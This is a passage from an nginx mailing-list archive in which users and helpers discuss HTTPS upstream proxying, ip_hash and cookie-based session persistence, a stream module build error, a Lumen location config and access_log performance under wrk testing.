unix:/var/run/php/php7.0-fpm.sock; > fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; > fastcgi_index index.php; > include fastcgi_params; > } > } > > All the non-existing files (it helps to define a seperate location for > static files though) and virtual paths are passed to the Laravel's > /index.php "router" and it knows what to do with it without any extra > mumbojumbo on nginx side. > Will consider it, but as menitoned above, making laravel "the" site is not appropriate for my context. From project722 at gmail.com Wed Jul 27 17:16:25 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 12:16:25 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> Message-ID: Ok. I was able to get it working by changing this: proxy_pass http://ssl_myapplicationsite.net ; to this: proxy_pass *https*://ssl_myapplicationsite.net ; On Wed, Jul 27, 2016 at 12:07 PM, Brian Pugh wrote: > Still not working. > > Logs show: > > 2016/07/27 11:59:35 [warn] 28038#28038: *3 upstream server temporarily > disabled while reading response header from upstream, client: > 192.168.254.202, server: myapplicationsite.net, request: "GET / > HTTP/1.1", upstream: *"http://192.168.155.120:443/ > "*, host: "myapplicationsite.net" > > Why does it show http:// with :443 here? > > Here is my updated config: > > http { > upstream mysiteapplication.net { > # Use ip hash for session persistance > ip_hash; > server backendappsite1:80; > server backendsiteapp2:80; > server backendsiteapp3:80; > > # The below only works on nginx plus > #sticky route $route_cookie $route_uri; > } > upstream ssl_mysiteapplication.net.net { > # Use ip hash for session persistance > ip_hash; > server backendappsite1:443; > server backendappsite2:443; > server backendappsite3:443; > > # The below only works on nginx plus > #sticky route $route_cookie $route_uri; > } > > Crasyangel - I am not sure where I am supposed to put this: > > u.default_port = 80; in ngx_http_upstream_server > > I tried it inside my http upstream block and got a message about > > unknown directive "u.default_port" > > Here is my updated default.conf: > > server { > listen 443 ssl; > server_name myapplicationsite.net; > keepalive_timeout 70; > > ssl_certificate /appssl/fd.crt; > ssl_certificate_key /appssl/lb.key; > ssl_protocols TLSv1 TLSv1.1 TLSv1.2; > ssl_ciphers HIGH:!aNULL:!MD5; > > location / { > proxy_pass http://ssl_test-resolve.cspire.net; > proxy_set_header HOST test-resolve.cspire.net; > > } > } > > > On Wed, Jul 27, 2016 at 11:18 AM, Reinis Rozitis wrote: > >> : "myapplicationsite.net" >>> 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily >>> disabled while connecting to upstream, client: 192.168.254.202, server: >>> myapplicationsite.net, request: "GET / HTTP/1.1", upstream: " >>> http://192.168.155.120:80/", host: "myapplicationsite.net" >>> >> >> Why is it trying to connect to my servers over port 80? I need to pass it >>> over on 443. How can I accomplish this? Even if I change the proxy pass to >>> https in the logs it still trys >>> >> >> As you don't specify the port in upstream {} block nginx uses the default >> which is 80 ( >> http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server ) >> >> Also for secure backend connection you should enable proxy_ssl. >> >> Reading >> https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ >> should probably be a good start. >> >> >> rr >> >> >> >> >> >> On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: >> Can anyone give me an example config of what it would look like in both >> nginx.conf and default.conf using the names/info I have provided? >> >> It seems you have taken the default configuration example but if you use >> nginx as a balancer without serving any .php (or other) files you actually >> don't need those *.php etc locations - a single location / {} will do the >> job (means all requests go to backends). >> >> For example: >> >> >> http { >> upstream myappliationsite.net { >> ip_hash; >> server backendappsite1.net; >> server backendappsite2.net; >> server backendappsite3.net; >> } >> >> server { >> listen 80; >> listen 443 ssl; >> >> server_name myappliationsite.net; >> >> location / { >> proxy_pass http://myappliationsite.net; >> proxy_set_header HOST myappliationsite.net; >> } >> } >> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> >> >> >> >> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From project722 at gmail.com Wed Jul 27 19:02:23 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 14:02:23 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> Message-ID: Reinis Rozitis said: Also for secure backend connection you should enable proxy_ssl. Reading https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ should probably be a good start. ===================================== Is this a feature I can get without having to purchase nginx plus? If my nginx server has an SSL cert loaded that validates the hostnames for the backend servers and my backend servers also have the same cert and communications are going over port 443 why would I need to do anything else? On Wed, Jul 27, 2016 at 12:16 PM, Brian Pugh wrote: > Ok. I was able to get it working by changing this: > > proxy_pass http://ssl_myapplicationsite.net > ; > > to this: > > proxy_pass *https*://ssl_myapplicationsite.net > ; > > > > On Wed, Jul 27, 2016 at 12:07 PM, Brian Pugh wrote: > >> Still not working. >> >> Logs show: >> >> 2016/07/27 11:59:35 [warn] 28038#28038: *3 upstream server temporarily >> disabled while reading response header from upstream, client: >> 192.168.254.202, server: myapplicationsite.net, request: "GET / >> HTTP/1.1", upstream: *"http://192.168.155.120:443/ >> "*, host: "myapplicationsite.net" >> >> Why does it show http:// with :443 here? >> >> Here is my updated config: >> >> http { >> upstream mysiteapplication.net { >> # Use ip hash for session persistance >> ip_hash; >> server backendappsite1:80; >> server backendsiteapp2:80; >> server backendsiteapp3:80; >> >> # The below only works on nginx plus >> #sticky route $route_cookie $route_uri; >> } >> upstream ssl_mysiteapplication.net.net { >> # Use ip hash for session persistance >> ip_hash; >> server backendappsite1:443; >> server backendappsite2:443; >> server backendappsite3:443; >> >> # The below only works on nginx plus >> #sticky route $route_cookie $route_uri; >> } >> >> Crasyangel - I am not sure where I am supposed to put this: >> >> u.default_port = 80; in ngx_http_upstream_server >> >> I tried it inside my http upstream block and got a message about >> >> unknown directive "u.default_port" >> >> Here is my updated default.conf: >> >> server { >> listen 443 ssl; >> server_name myapplicationsite.net; >> keepalive_timeout 70; >> >> ssl_certificate /appssl/fd.crt; >> ssl_certificate_key /appssl/lb.key; >> ssl_protocols TLSv1 TLSv1.1 TLSv1.2; >> ssl_ciphers HIGH:!aNULL:!MD5; >> >> location / { >> proxy_pass http://ssl_test-resolve.cspire.net; >> proxy_set_header HOST test-resolve.cspire.net; >> >> } >> } >> >> >> On Wed, Jul 27, 2016 at 11:18 AM, Reinis Rozitis wrote: >> >>> : "myapplicationsite.net" >>>> 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily >>>> disabled while connecting to upstream, client: 192.168.254.202, server: >>>> myapplicationsite.net, request: "GET / HTTP/1.1", upstream: " >>>> http://192.168.155.120:80/", host: "myapplicationsite.net" >>>> >>> >>> Why is it trying to connect to my servers over port 80? I need to pass >>>> it over on 443. How can I accomplish this? Even if I change the proxy pass >>>> to https in the logs it still trys >>>> >>> >>> As you don't specify the port in upstream {} block nginx uses the >>> default which is 80 ( >>> http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server ) >>> >>> Also for secure backend connection you should enable proxy_ssl. >>> >>> Reading >>> https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ >>> should probably be a good start. >>> >>> >>> rr >>> >>> >>> >>> >>> >>> On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: >>> Can anyone give me an example config of what it would look like in both >>> nginx.conf and default.conf using the names/info I have provided? >>> >>> It seems you have taken the default configuration example but if you use >>> nginx as a balancer without serving any .php (or other) files you actually >>> don't need those *.php etc locations - a single location / {} will do the >>> job (means all requests go to backends). >>> >>> For example: >>> >>> >>> http { >>> upstream myappliationsite.net { >>> ip_hash; >>> server backendappsite1.net; >>> server backendappsite2.net; >>> server backendappsite3.net; >>> } >>> >>> server { >>> listen 80; >>> listen 443 ssl; >>> >>> server_name myappliationsite.net; >>> >>> location / { >>> proxy_pass http://myappliationsite.net; >>> proxy_set_header HOST myappliationsite.net; >>> } >>> } >>> >>> >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >>> >>> >>> >>> >>> >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Jul 27 19:16:56 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 22:16:56 +0300 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> <240A20A4901A42C99CE03A88864C1A0D@MezhRoze> Message-ID: <322E9BC92191421CAB6EFD8952734AFC@MezhRoze> > Is this a feature I can get without having to purchase nginx plus? Yes, it's also mentioned in the article ".. or the latest NGINX Open Source compiled .." Afaik there are no extra nginx+ features in the proxy module, the upstream has dynamic backend and healthchecks in the commercial subscription though. rr From r at roze.lv Wed Jul 27 19:42:32 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 22:42:32 +0300 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <34a6d1b4-14be-5f65-989d-c0c070148166@list-subs.com> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> <4A4C61D6138D47519CACC5491D364F22@MezhRoze> <86be9233-94ed-0db5-9039-a8400ae5fc02@list-subs.com> <40BDE3D7C3104BC39A3139766ECF2C6F@MezhRoze> <34a6d1b4-14be-5f65-989d-c0c070148166@list-subs.com> Message-ID: <7A17EF0D124244BAA0584875EC8E69C9@MezhRoze> > Will consider it, but as menitoned above, making laravel "the" site is not > appropriate for my context. Because of how nginx locations work (only one gets chosen for a request) running several applications under one virtualserver/domain can sometimes be challenging. Also because the laravel/lumen applications do have their 'public' as second level folder means if you put the whole application into existing root all the "non-public" (upper-level) folders get somewhat exposed. If the Lumen app is outside the default root you could try something like this: location ^~ /lumen { alias /usr/share/path/to/my/lumen/public; try_files $uri $uri/ /lumen/index.php?$query_string; location ~ \.php$ { fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_index index.php; include fastcgi_params; } } There is an extra nested location .php {} within the /lumen location since if you have a global *.php block the request won't have the alias directive active. rr From project722 at gmail.com Wed Jul 27 20:21:03 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 15:21:03 -0500 Subject: session persistance with IP hash Message-ID: Running nginx free version 1.10.1-1.el6.ngx.x86_64 on RHEL 6.7. In my conf I am using http { upstream backend { # Use ip hash for session persistance *ip_hash;* server backend1:80; server backend2:80; server backend3:80; } My understanding is that the ip_hash directive is responsible for session persistence. My questions are: 1) How long does it last? For example, if I connect and my ip hash tells nginx to connect to backend3, will my source IP be forever tied to backend 3? 2) Is there another way to acheive session persistence other than ip hash and other than purchasing plus edition? 3) Is there an ip hash "cache" or something I can clean out periodically to force the source IP to get a new hash and therefore a chance to connect to a different server? -------------- next part -------------- An HTML attachment was scrubbed... URL: From rpaprocki at fearnothingproductions.net Wed Jul 27 20:35:06 2016 From: rpaprocki at fearnothingproductions.net (Robert Paprocki) Date: Wed, 27 Jul 2016 13:35:06 -0700 Subject: session persistance with IP hash In-Reply-To: References: Message-ID: Hello, On Wed, Jul 27, 2016 at 1:21 PM, Brian Pugh wrote: > Running nginx free version 1.10.1-1.el6.ngx.x86_64 on RHEL 6.7. In my conf > I am using > > http { > upstream backend { > # Use ip hash for session persistance > *ip_hash;* > server backend1:80; > server backend2:80; > server backend3:80; > > } > > My understanding is that the ip_hash directive is responsible for session > persistence. My questions are: > > 1) How long does it last? For example, if I connect and my ip hash tells > nginx to connect to backend3, will my source IP be forever tied to backend > 3? > Yes, sorta. Hashing does not really provide "persistence" in the manner you're thinking of. An upstream block using hashing will provide a backend for a given client based on a deterministic hashing algorithm (something roughly like crc32 of the key, modulo the number of elements in the upstream group, then accounting for weights). Hash-based balancing is designed to always provide the same value of a given key, provided that the weights and status of all backend nodes does not change. If the weights are changed during runtime, or a node is unreachable, then the hash will return a different value (and once the node is reachable again, the previous value will be returned subsequent requests). 2) Is there another way to acheive session persistence other than ip hash > and other than purchasing plus edition? > There are some third-party modules available, but the quality and stability of those isn't guaranteed. 3) Is there an ip hash "cache" or something I can clean out periodically to > force the source IP to get a new hash and therefore a chance to connect to > a different server? > No, see above. Hashing algorithms are deterministic, given the same number and weight distribution of backend nodes, you will _always_ get the same result. That's the point ;) There's no "cache" or pre-determined result for a given client IP - the upstream is re-calculated with the hashing algorithm on every request. If Nginx cannot connect to the upstream node that its hashing algorithm first selects, it will move on to subsequent nodes in the backend. If you want very fine-grained/custom/arbitrary load balancing algorithms, you can write your own in Lua using the ngx+lua module and the balancer_by_lua directive ( https://github.com/openresty/lua-resty-core/blob/master/lib/ngx/balancer.md). This is not available from vanilla open source Nginx, but it is available as part of the OpenResty project. Do also note that in addition to ip_hash method there is a generic hash method that can take arbitrary keys to generate the hash. This can include Nginx variables, such as $uri, header values, etc. -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Jul 27 20:44:00 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 23:44:00 +0300 Subject: session persistance with IP hash In-Reply-To: References: Message-ID: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> > My understanding is that the ip_hash directive is responsible for session > persistence. My questions are: > 1) How long does it last? For example, if I connect and my ip hash tells > nginx to connect to backend3, will my source IP be forever tied to backend > 3? If your IP doesn't change and all the servers are up, you will most likely always land on the same backend server. http://nginx.org/en/docs/http/ngx_http_upstream_module.html#ip_hash > 2) Is there another way to acheive session persistence other than ip hash > and other than purchasing plus edition? Yes, you can use different hash mechanisms/keys (for example specific cookies etc): https://nginx.org/en/docs/stream/ngx_stream_upstream_module.html#hash There are also some third-party sticky cookie modules. I personally preffer to use centralised cache storage (memcache/redis etc) so it doesn't matter on which server the user lands and they can be used in roundrobin fashion. > 3) Is there an ip hash "cache" or something I can clean out periodically > to force the source IP to get a new hash and therefore a chance to connect > to a different server? The standard nginx hash mechanisms don't have any inbuilt "cache". In case of ip_hash you can change the upstream server order (though it will swap arround all the users not only particular remote addr). rr From project722 at gmail.com Wed Jul 27 20:55:11 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 15:55:11 -0500 Subject: session persistance with IP hash In-Reply-To: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> Message-ID: Reinis Rozitis said: Yes, you can use different hash mechanisms/keys (for example specific cookies etc): https://nginx.org/en/docs/stream/ngx_stream_upstream_module.html#hash There are also some third-party sticky cookie modules. Took a look at the link, but I have no idea what that would look like in my upstream stanza. Can you provide an example of what that would look like if I had 3 different backend servers and wanted to ensure that my hash was based on a cookie, or based on just a hash that provided a different backend server per session? So in theory I could also just run a daily script to weight the servers differently or change the server order to manipulate how the hash is calculated? Has that ever been done with success? On Wed, Jul 27, 2016 at 3:44 PM, Reinis Rozitis wrote: > My understanding is that the ip_hash directive is responsible for session >> persistence. My questions are: >> 1) How long does it last? For example, if I connect and my ip hash tells >> nginx to connect to backend3, will my source IP be forever tied to backend >> 3? >> > > If your IP doesn't change and all the servers are up, you will most likely > always land on the same backend server. > http://nginx.org/en/docs/http/ngx_http_upstream_module.html#ip_hash > > > 2) Is there another way to acheive session persistence other than ip hash >> and other than purchasing plus edition? >> > > Yes, you can use different hash mechanisms/keys (for example specific > cookies etc): > https://nginx.org/en/docs/stream/ngx_stream_upstream_module.html#hash > > There are also some third-party sticky cookie modules. > > > I personally preffer to use centralised cache storage (memcache/redis etc) > so it doesn't matter on which server the user lands and they can be used in > roundrobin fashion. > > > 3) Is there an ip hash "cache" or something I can clean out periodically >> to force the source IP to get a new hash and therefore a chance to connect >> to a different server? >> > > The standard nginx hash mechanisms don't have any inbuilt "cache". In case > of ip_hash you can change the upstream server order (though it will swap > arround all the users not only particular remote addr). > > rr > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Jul 27 22:01:56 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 28 Jul 2016 01:01:56 +0300 Subject: session persistance with IP hash In-Reply-To: References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> Message-ID: <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> >Took a look at the link, but I have no idea what that would look like in my >upstream stanza. Can you provide an example of what that would look like if >I had 3 different backend servers and wanted to ensure that my hash was >based on a cookie, or based on just a hash that provided a different >backend server per session? With the vanilla nginx it would be something like (and for example let's say your cookie name is BACKEND): upstream backend { hash $cookie_BACKEND; server backend1:80; server backend2:80; server backend3:80; } The problem with this (if it matters) is that there is no (pre)defined value of the cookie BACKEND which would specifically route particular client to particular backend - I mean for example if you use values 'backend1', 'backend2', 'backend3' the hashed keys might (or not) aswell all point to the same backend server. So unless you find 3 values which for sure point to different backends the load/users might not be evenly distributed (in general it is the same as with ip_hash if the end-users don't have very distinct IPs or for example are in the same subnet all the users will land on the same backend (as per documentation - "The first three octets of the client IPv4 address are used as a hashing key.")). It shouldn't be too hard though. Of course if the values differ (for each user a different cookie) in longer run the requests will be somewhat evenly distributed. As a module you can try this https://bitbucket.org/nginx-goodies/nginx-sticky-module-ng/overview but as it was mentioned in previous mail by Robert the quality might vary and if you want a better controlable user distribution Lua could be also an option. p.s. In case of the bare nginx the first request is "problematic" since there won't be any cookie so it will always land on one backend and later if the cookie gets generated by backend application the user might get "moved" to a different backend server. (eg that? why it is better to use a hash key like ip / url or browser agent header which is known to nginx immediately) rr From project722 at gmail.com Thu Jul 28 01:23:36 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 20:23:36 -0500 Subject: session persistance with IP hash In-Reply-To: <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> Message-ID: Reinis Rozitis said: The problem with this (if it matters) is that there is no (pre)defined value of the cookie BACKEND which would specifically route particular client to particular backend - I mean for example if you use values 'backend1', 'backend2', 'backend3' the hashed keys might (or not) aswell all point to the same backend server. ================================ I'm not as concerned with what server its routed to as much as I am concerned with the client session "sticking" to the server it was routed to. And I really do not know enough about how to use cookie based hashing. In order to have cookie bashed hashing would the cookie need to be common among all pages at the target URL in order to stick the session to a particular server for the duration of that session? (And, I assume cookie bashed hashing is not like ip hash in that you are only stuck to a particular server for the duration of that browser session?) Also, what is the logic behind "round-robin" or is that the same as ip_hash? For instance, If I have a client at 192.168.100.10 that's assigned to backend 3, then, 100 more clients come along on the same subnet, they will all land on backend 3. Next client 192.168.200.10 comes along, what determines whether it lands on backend1 or backend2? Or, is there a chance it could also land on backend3? On Wed, Jul 27, 2016 at 5:01 PM, Reinis Rozitis wrote: > Took a look at the link, but I have no idea what that would look like in >> my upstream stanza. Can you provide an example of what that would look like >> if I had 3 different backend servers and wanted to ensure that my hash was >> based on a cookie, or based on just a hash that provided a different >> backend server per session? >> > > > With the vanilla nginx it would be something like (and for example let's > say your cookie name is BACKEND): > > upstream backend { > hash $cookie_BACKEND; > server backend1:80; > server backend2:80; > server backend3:80; > } > > > The problem with this (if it matters) is that there is no (pre)defined > value of the cookie BACKEND which would specifically route particular > client to particular backend - I mean for example if you use values > 'backend1', 'backend2', 'backend3' the hashed keys might (or not) aswell > all point to the same backend server. > So unless you find 3 values which for sure point to different backends the > load/users might not be evenly distributed (in general it is the same as > with ip_hash if the end-users don't have very distinct IPs or for example > are in the same subnet all the users will land on the same backend (as per > documentation - "The first three octets of the client IPv4 address are used > as a hashing key.")). It shouldn't be too hard though. > > Of course if the values differ (for each user a different cookie) in > longer run the requests will be somewhat evenly distributed. > > As a module you can try this > https://bitbucket.org/nginx-goodies/nginx-sticky-module-ng/overview but > as it was mentioned in previous mail by Robert the quality might vary and > if you want a better controlable user distribution Lua could be also an > option. > > > p.s. In case of the bare nginx the first request is "problematic" since > there won't be any cookie so it will always land on one backend and later > if the cookie gets generated by backend application the user might get > "moved" to a different backend server. (eg that? why it is better to use a > hash key like ip / url or browser agent header which is known to nginx > immediately) > > > rr > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From rpaprocki at fearnothingproductions.net Thu Jul 28 01:44:49 2016 From: rpaprocki at fearnothingproductions.net (Robert Paprocki) Date: Wed, 27 Jul 2016 18:44:49 -0700 Subject: session persistance with IP hash In-Reply-To: References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> Message-ID: > > > I'm not as concerned with what server its routed to as much as I am > concerned with the client session "sticking" to the server it was routed > to. And I really do not know enough about how to use cookie based hashing. > In order to have cookie bashed hashing would the cookie need to be common > among all pages at the target URL in order to stick the session to a > particular server for the duration of that session? > Assuming you're using a cookie to track the session, the cookie shouldn't change depending on what URI the user is accessing. > (And, I assume cookie bashed hashing is not like ip hash in that you are > only stuck to a particular server for the duration of that browser session?) > Depends on how long the cookie lives on the browser. If the cookie never changes and doesn't expire when the browser closes, the backend wouldn't change (again, assuming nothing changed about the backend servers). It doesn't matter what is used to build the hash key - cookie, ip, whatever. As long as that value doesn't change, and nothing changes about your backends, the client will hit the same backend every time. Guaranteed. > Also, what is the logic behind "round-robin" or is that the same as > ip_hash? For instance, If I have a client at 192.168.100.10 that's assigned > to backend 3, then, 100 more clients come along on the same subnet, they > will all land on backend 3. Next client 192.168.200.10 comes along, what > determines whether it lands on backend1 or backend2? Or, is there a chance > it could also land on backend3? > Round robin means that each backend will be used in turn, regardless of the client. For example, if you have 3 backends: request 1 -> backend1 request 2 -> backend2 request 3 -> backend3 request 4 -> backend1 request 5 -> backend2 This goes on forever, regardless of the client IP. (Of course, this is relative if you are using server weights - see the example at http://nginx.org/en/docs/http/ngx_http_upstream_module.html#upstream for a round robin example with weights). If you want session persistence, then round robin balancing is not for you. -------------- next part -------------- An HTML attachment was scrubbed... URL: From dewanggaba at xtremenitro.org Thu Jul 28 07:31:25 2016 From: dewanggaba at xtremenitro.org (Dewangga Bachrul Alam) Date: Thu, 28 Jul 2016 14:31:25 +0700 Subject: ngx_stream module build error on 1.11.3 Message-ID: Hello! I've tried to build nginx 1.11.3 with --with-stream module parameter, but, attached below: .. snip .. ./configure \ --prefix=%{_sysconfdir}/nginx \ --sbin-path=%{_sbindir}/nginx \ --conf-path=%{_sysconfdir}/nginx/nginx.conf \ --error-log-path=%{_localstatedir}/log/nginx/error.log \ --http-log-path=%{_localstatedir}/log/nginx/access.log \ --pid-path=%{_localstatedir}/run/nginx.pid \ --lock-path=%{_localstatedir}/run/nginx.lock \ --http-client-body-temp-path=%{_localstatedir}/cache/nginx/client_temp \ --http-proxy-temp-path=%{_localstatedir}/cache/nginx/proxy_temp \ --http-fastcgi-temp-path=%{_localstatedir}/cache/nginx/fastcgi_temp \ --http-uwsgi-temp-path=%{_localstatedir}/cache/nginx/uwsgi_temp \ --http-scgi-temp-path=%{_localstatedir}/cache/nginx/scgi_temp \ --user=%{nginx_user} \ --group=%{nginx_group} \ --with-http_ssl_module \ --with-http_realip_module \ --with-http_addition_module \ --with-http_sub_module \ --with-http_dav_module \ --with-http_gunzip_module \ --with-http_gzip_static_module \ --with-http_random_index_module \ --with-http_secure_link_module \ --with-http_stub_status_module \ --with-http_auth_request_module \ --with-http_slice_module \ --with-stream \ --with-mail \ --with-mail_ssl_module \ --with-file-aio \ --with-ipv6 \ %{?with_http2:--with-http_v2_module} \ --with-cc-opt="%{optflags} $(pcre-config --cflags)" \ $* .. snip .. The error was : src/stream/ngx_stream_proxy_module.c: In function 'ngx_stream_proxy_handler': src/stream/ngx_stream_proxy_module.c:542:6: error: 'ngx_stream_upstream_t {aka struct }' has no member named 'ssl_name' u->ssl_name = uscf->host; ^~ cc -c -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -m64 -mtune=generic -I src/core -I src/event -I src/event/modules -I src/os/unix -I objs -I src/stream \ -o objs/src/stream/ngx_stream_upstream_round_robin.o \ src/stream/ngx_stream_upstream_round_robin.c objs/Makefile:1498: recipe for target 'objs/src/stream/ngx_stream_proxy_module.o' failed make[1]: *** [objs/src/stream/ngx_stream_proxy_module.o] Error 1 make[1]: *** Waiting for unfinished jobs.... make[1]: Leaving directory '/home/dominique/rpmbuild/BUILD/nginx-1.11.3' Makefile:8: recipe for target 'build' failed make: *** [build] Error 2 error: Bad exit status from /var/tmp/rpm-tmp.IciEtd (%build) The build was normal without stream parameter. From zeal at freecharge.com Thu Jul 28 07:42:48 2016 From: zeal at freecharge.com (Zeal Vora) Date: Thu, 28 Jul 2016 13:12:48 +0530 Subject: basic question about In-Reply-To: References: Message-ID: Hi Andrea, The 404 Forbidden error is because of the permission of that particular file / directory . NGINX process should be able to read that file in /home/a/all/index.html. Cheers! Zeal On Tue, Jul 26, 2016 at 4:47 PM, ndrini wrote: > I have this server block in a EC2 nginx webserver. > > > > server { > listen 80 default_server; > root /home/a/all; > index index.html; > > location / { > try_files $uri $uri/ =404; > } > } > > > In my idea all the sites that point to the server should show the same > page: > > index.html located in root /home/a/all/index.html > > > But I have an > 403 Forbidden > nginx/1.4.6 (Ubuntu) > > :( > > > Why? > > Thanks, > > Andrea > > Posted at Nginx Forum: > https://forum.nginx.org/read.php?2,268466,268466#msg-268466 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From maxim at nginx.com Thu Jul 28 08:29:52 2016 From: maxim at nginx.com (Maxim Konovalov) Date: Thu, 28 Jul 2016 11:29:52 +0300 Subject: ngx_stream module build error on 1.11.3 In-Reply-To: References: Message-ID: Hi Dewangga, On 7/28/16 10:31 AM, Dewangga Bachrul Alam wrote: > Hello! > > I've tried to build nginx 1.11.3 with --with-stream module parameter, > but, attached below: > [...] That was already fixed. As a workaround you can add "--with-stream_ssl_module" to your configure args. -- Maxim Konovalov From dewanggaba at xtremenitro.org Thu Jul 28 08:41:43 2016 From: dewanggaba at xtremenitro.org (Dewangga Bachrul Alam) Date: Thu, 28 Jul 2016 15:41:43 +0700 Subject: ngx_stream module build error on 1.11.3 In-Reply-To: References: Message-ID: <8d7939c4-4ce5-7a86-b179-06598805b949@xtremenitro.org> Thanks Maxim, its works. :) On 07/28/2016 03:29 PM, Maxim Konovalov wrote: > Hi Dewangga, > > On 7/28/16 10:31 AM, Dewangga Bachrul Alam wrote: >> Hello! >> >> I've tried to build nginx 1.11.3 with --with-stream module parameter, >> but, attached below: >> > [...] > > That was already fixed. > > As a workaround you can add "--with-stream_ssl_module" to your > configure args. > From nginx-forum at forum.nginx.org Thu Jul 28 14:32:13 2016 From: nginx-forum at forum.nginx.org (stevewin) Date: Thu, 28 Jul 2016 10:32:13 -0400 Subject: Access_log off impact on Requests/sec Message-ID: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org> I am beginning to look at NGINX performance on a development system with traffic driven by Wrk. Initially I am just looking at static HTTP serving. I am using NGINX v1.10.1 running on the host system with Ubuntu 16.04. Wrk v4.0.4 is running from a separate client platform over a private 40GB connection. The CPU on the host system has 24 cores (no hyperthreading). I had started to look into various NGINX and kernel parameters for performance optimization. One thing that I am seeing that appears odd to me is that when I change access_log to off (from the default of specifying a log location) it seems to decrease the requests/sec that I am seeing when connections increase (using defaults with everything else being equal). Does this make sense? The results with defaults including ?access_log /var/log/nginx/access.log;? show the Requests/sec ramping up to ~24.5K and staying there. The results with defaults and access_log changed to ?access_log off;? show the Requests/sec initially ramping up to ~28.5K but then decreasing down to ~20K and staying there. The NGINX config is at the bottom. Can someone explain possible reasons for this behavior? Results: access_log /var/log/nginx/access.log; + wrk -t8 -c8 -d1m http:// Running 1m test @ http:// 8 threads and 8 connections Thread Stats Avg Stdev Max +/- Stdev Latency 0.87ms 3.15ms 75.93ms 97.13% Req/Sec 2.43k 409.97 4.43k 73.88% 1163065 requests in 1.00m, 0.92GB read Requests/sec: 19352.37 Transfer/sec: 15.69MB + wrk -t16 -c16 -d1m http:// Running 1m test @ http:// 16 threads and 16 connections Thread Stats Avg Stdev Max +/- Stdev Latency 1.61ms 5.65ms 102.08ms 96.23% Req/Sec 1.56k 314.27 4.48k 74.08% 1492822 requests in 1.00m, 1.18GB read Requests/sec: 24839.12 Transfer/sec: 20.13MB + wrk -t16 -c24 -d1m http:// Running 1m test @ http:// 16 threads and 24 connections Thread Stats Avg Stdev Max +/- Stdev Latency 1.25ms 4.48ms 102.89ms 97.37% Req/Sec 1.56k 312.01 3.36k 73.64% 1493188 requests in 1.00m, 1.18GB read Requests/sec: 24845.17 Transfer/sec: 20.14MB + wrk -t16 -c32 -d1m http:// Running 1m test @ http:// 16 threads and 32 connections Thread Stats Avg Stdev Max +/- Stdev Latency 3.94ms 12.93ms 